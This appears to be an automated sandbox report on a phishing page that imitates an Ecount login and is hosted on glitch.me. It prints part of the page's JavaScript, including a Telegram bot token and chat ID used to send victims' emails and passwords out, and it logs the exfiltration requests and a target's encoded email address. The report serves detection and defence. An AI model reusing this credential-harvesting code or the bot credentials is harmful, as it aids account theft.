Edit tour

Windows Analysis Report
https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==

Overview

General Information

Sample URL:	https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==
Analysis ID:	1636826
Infos:

Detection

HTMLPhisher

Score:	80
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

AI detected suspicious Javascript

Javascript uses Clearbit API to dynamically determine company logos

Javascript uses Telegram API

Uses the Telegram API (likely for C&C communication)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Javascript checks online IP of machine

Classification

Process Tree

System is w10x64

chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4680 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 2868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T07:35:47.923778+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49743	149.154.167.220	443	TCP
2025-03-13T07:35:51.789593+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49745	149.154.167.220	443	TCP
2025-03-13T07:36:08.924348+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	54910	149.154.167.220	443	TCP
2025-03-13T07:36:12.876771+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	54912	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	Joe Sandbox AI: Score: 9 Reasons: The brand 'Ecount' is associated with ERP solutions and is known, but not as globally recognized as 'wellknown' brands., The URL 'magnificent-absorbed-ravioli.glitch.me' does not match the legitimate domain 'ecount.com'., The use of 'glitch.me' as a domain extension is unusual for a legitimate business site and is often used for personal or experimental projects., The URL contains random words ('magnificent-absorbed-ravioli') which are not related to the brand, indicating a potential phishing attempt., The presence of input fields for email and password suggests an attempt to collect sensitive information, which is common in phishing sites. DOM: 0.0.pages.csv
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	Joe Sandbox AI: Score: 9 Reasons: The brand 'BBB' is most likely referring to the Better Business Bureau, which is a well-known organization., The legitimate domain for the Better Business Bureau is 'bbb.org'., The URL 'magnificent-absorbed-ravioli.glitch.me' does not match the legitimate domain 'bbb.org'., The URL uses 'glitch.me', which is a platform for hosting web applications and is not associated with the Better Business Bureau., The URL contains random words 'magnificent-absorbed-ravioli', which is a common tactic in phishing to create subdomains that appear legitimate., The presence of email and password input fields suggests an attempt to collect sensitive information, which is a common phishing tactic. DOM: 0.1.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.3.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.4.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of heavily obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, potentially for phishing or other malicious activities.
Source: 0.0..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://magnificent-absorbed-ravioli.glitch.me/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of the `Function` constructor, encoded strings, and interactions with suspicious domains indicate a high likelihood of malicious intent. This script should be considered a significant security risk.
Source: 0.3.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that collects user data and potentially redirects to a fake login page. The overall behavior is highly suspicious and poses a significant security risk.
Source: 0.15..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://magnificent-absorbed-ravioli.glitch.me/... This JavaScript snippet exhibits several high-risk behaviors that indicate potential malicious intent. It includes dynamic code execution, data exfiltration, and obfuscated code/URLs, which are all considered high-risk indicators. Additionally, the script sends user data to untrusted domains, which further increases the risk. Overall, the combination of these behaviors and the lack of transparency around the script's purpose suggests a high-risk scenario.
Source: 0.1.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of the `eval` function, sending data to unknown external domains, and the extensive use of encoded strings indicate a high likelihood of malicious intent. Additionally, the script appears to be attempting to bypass security measures, making it a significant risk.
Source: 0.11.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The extensive use of encoded strings and multiple fallback domains, along with the script's overall suspicious nature, indicate a high likelihood of malicious intent. This script should be considered a significant security risk.
Source: 0.9.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of `eval`, `Function` constructor, and sending user data to unknown external domains are clear indicators of malicious intent. The overall level of obfuscation and lack of transparency make this script highly suspicious and potentially harmful.
Source: 0.10.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be a malicious phishing attempt, collecting user credentials and redirecting to a suspicious domain. The overall behavior is highly suspicious and poses a significant risk to users.
Source: 0.12.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk indicators, including dynamic code execution, data exfiltration, and heavily obfuscated code. The use of the `Function` constructor to execute remote or dynamic code is a clear sign of malicious intent. Additionally, the script appears to be sending sensitive data (potentially user information or credentials) to an untrusted external domain, which poses a significant risk of data exfiltration. The heavy obfuscation of the code further suggests an attempt to conceal the script's true purpose. Overall, this script demonstrates a high level of suspicion and should be treated as a potential security threat.

Javascript uses Clearbit API to dynamically determine company logos

Source: https://magnificent-absorbed-ravioli.glitch.me/

HTTP Parser: const bot_token = "7051308130:aagpocy-skirra6hgu3n13yjlxtbmoxjxua"; const chat_id = "1739269434"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...

Javascript uses Telegram API

Source: https://magnificent-absorbed-ravioli.glitch.me/

Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==

HTTP Parser: Number of links: 0

Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==

HTTP Parser: Title: ECOUNT Login | ECOUNT does not match URL

Source: https://magnificent-absorbed-ravioli.glitch.me/

Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==

HTTP Parser: <input type="password" .../> found

Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="author".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="author".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="author".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="author".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="author".. found

Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="copyright".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="copyright".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="copyright".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="copyright".. found
Source: https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	HTTP Parser: No <meta name="copyright".. found

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49745 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:54912 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:54910 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.5:54906 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:53408 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.96.130
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: magnificent-absorbed-ravioli.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uploads/2020/06/ECount-logo1-220x90.png HTTP/1.1Host: financesonline.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://magnificent-absorbed-ravioli.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uploads/2020/06/ECount-logo1-220x90.png HTTP/1.1Host: financesonline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://magnificent-absorbed-ravioli.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://magnificent-absorbed-ravioli.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /resolve?name=korea.kr&type=MX HTTP/1.1Host: dns.googleConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://magnificent-absorbed-ravioli.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://magnificent-absorbed-ravioli.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /resolve?name=korea.kr&type=MX HTTP/1.1Host: dns.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://magnificent-absorbed-ravioli.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://magnificent-absorbed-ravioli.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ln.run
Source: global traffic	DNS traffic detected: DNS query: magnificent-absorbed-ravioli.glitch.me
Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: financesonline.com
Source: global traffic	DNS traffic detected: DNS query: www.hashmicro.com
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: resource.ecount.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: dns.google
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 607sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: https://magnificent-absorbed-ravioli.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://magnificent-absorbed-ravioli.glitch.me/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_88.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6o3ms.woff2
Source: chromecache_88.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.wo
Source: chromecache_88.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.wo
Source: chromecache_93.2.dr, chromecache_96.2.dr	String found in binary or memory: https://ipinfo.io/missingauth

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54908
Source: unknown	Network traffic detected: HTTP traffic on port 54911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54912
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54910
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir7136_242083022

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir7136_242083022

Jump to behavior

Source: classification engine

Classification label: mal80.phis.troj.win@24/31@39/16

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4680 /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
